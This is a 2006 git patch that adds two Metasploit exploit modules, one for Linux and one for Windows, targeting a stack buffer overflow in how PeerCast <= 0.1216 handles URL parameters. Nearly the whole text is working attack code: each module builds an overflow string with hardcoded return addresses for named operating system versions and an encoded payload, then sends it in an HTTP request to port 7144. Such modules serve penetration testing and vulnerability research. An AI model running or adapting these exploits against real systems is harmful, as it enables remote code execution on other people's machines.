From 86671cef8968c0c3ef330015e1f4002d7784d99a Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 30 Mar 2006 21:05:42 +0000 Subject: [PATCH] PeerCast exploits git-svn-id: file:///home/svn/incoming/trunk@3583 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/linux/http/peercast_url.rb | 65 +++++++++++++++++ modules/exploits/windows/http/peercast_url.rb | 69 +++++++++++++++++++ 2 files changed, 134 insertions(+) create mode 100644 modules/exploits/linux/http/peercast_url.rb create mode 100644 modules/exploits/windows/http/peercast_url.rb diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb new file mode 100644 index 0000000000..22bbd9fd4a --- /dev/null +++ b/modules/exploits/linux/http/peercast_url.rb @@ -0,0 +1,65 @@ +require 'msf/core' + +module Msf + +class Exploits::Linux::Http::PeerCast_URL < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)', + 'Description' => %q{ + This module exploits a stack overflow in PeerCast <= v0.1216. + The vulnerability is caused due to a boundary error within the + handling of URL parameters. + + }, + 'Author' => [ 'y0 [at] w00t-shell.net' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + ['OSVDB', '23777'], + ['BID', '17040'], + ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], + + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 200, + 'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b", + 'MinNops' => 64, + }, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Targets' => + [ + ['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }], + ], + 'DisclosureDate' => 'Mar 8 2006')) + + register_options( [ Opt::RPORT(7144) ], self.class ) + end + + def exploit + connect + + pat = Rex::Text.rand_text_alphanumeric(780) + pat << [target.ret].pack('V') + pat << payload.encoded + + uri = '/stream/?' + pat + + res = "GET #{uri} HTTP/1.0\r\n\r\n" + + print_status("Trying target address 0x%.8x..." % target.ret) + sock.put(res) + + handler + disconnect + end + +end +end diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb new file mode 100644 index 0000000000..43846acaee --- /dev/null +++ b/modules/exploits/windows/http/peercast_url.rb @@ -0,0 +1,69 @@ +require 'msf/core' + +module Msf + +class Exploits::Windows::Http::PeerCast_URL < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)', + 'Description' => %q{ + This module exploits a stack overflow in PeerCast <= v0.1216. + The vulnerability is caused due to a boundary error within the + handling of URL parameters. + + }, + 'Author' => [ 'H D Moore ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + ['OSVDB', '23777'], + ['BID', '17040'], + ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], + + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }], + ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }], + ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }], + ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }], + ], + 'DisclosureDate' => 'Mar 8 2006')) + + register_options( [ Opt::RPORT(7144) ], self.class ) + end + + def exploit + connect + + pat = Rex::Text.rand_text_alphanumeric(1024) + pat[768, 4] = [target.ret].pack('V') + pat[812, 5] = [0xe9, -517].pack('CV') + pat[300, payload.encoded.length] = payload.encoded + + uri = '/stream/?' + pat + + res = "GET #{uri} HTTP/1.0\r\n\r\n" + + print_status("Trying target address 0x%.8x..." % target.ret) + sock.put(res) + sock.close + + handler + disconnect + end + +end +end